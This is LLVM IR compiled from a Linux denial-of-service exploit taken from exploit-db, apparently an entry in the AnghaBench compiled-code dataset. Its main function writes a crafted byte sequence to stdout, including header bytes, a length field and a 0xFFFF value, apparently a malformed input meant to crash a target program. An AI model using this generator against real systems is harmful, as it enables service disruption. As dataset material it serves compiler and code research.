; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_20023.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_20023.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i8**, align 8
  %5 = alloca i8, align 1
  %6 = alloca i32, align 4
  %7 = alloca i16, align 2
  %8 = alloca [1000 x i8], align 16
  store i32 %0, i32* %3, align 4
  store i8** %1, i8*** %4, align 8
  %9 = getelementptr inbounds [1000 x i8], [1000 x i8]* %8, i64 0, i64 0
  %10 = call i32 @memset(i8* %9, i8 signext 0, i32 1000)
  store i8 0, i8* %5, align 1
  %11 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i8 1, i8* %5, align 1
  %12 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i8 0, i8* %5, align 1
  %13 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i8 0, i8* %5, align 1
  %14 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i32 0, i32* %6, align 4
  %15 = call i32 (i32, ...) @write(i32 1, i32* %6, i32 4)
  store i8 0, i8* %5, align 1
  %16 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i8 2, i8* %5, align 1
  %17 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i8 -1, i8* %5, align 1
  %18 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  %19 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  store i32 8, i32* %6, align 4
  %20 = call i32 (i32, ...) @write(i32 1, i32* %6, i32 4)
  store i8 0, i8* %5, align 1
  %21 = call i32 (i32, ...) @write(i32 1, i8* %5, i32 1)
  %22 = getelementptr inbounds [1000 x i8], [1000 x i8]* %8, i64 0, i64 0
  %23 = call i32 (i32, ...) @write(i32 1, i8* %22, i32 7)
  store i16 -1, i16* %7, align 2
  %24 = call i32 (i32, ...) @write(i32 1, i16* %7, i32 2)
  %25 = getelementptr inbounds [1000 x i8], [1000 x i8]* %8, i64 0, i64 0
  %26 = call i32 (i32, ...) @write(i32 1, i8* %25, i32 54)
  ret i32 0
}

declare dso_local i32 @memset(i8*, i8 signext, i32) #1

declare dso_local i32 @write(i32, ...) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
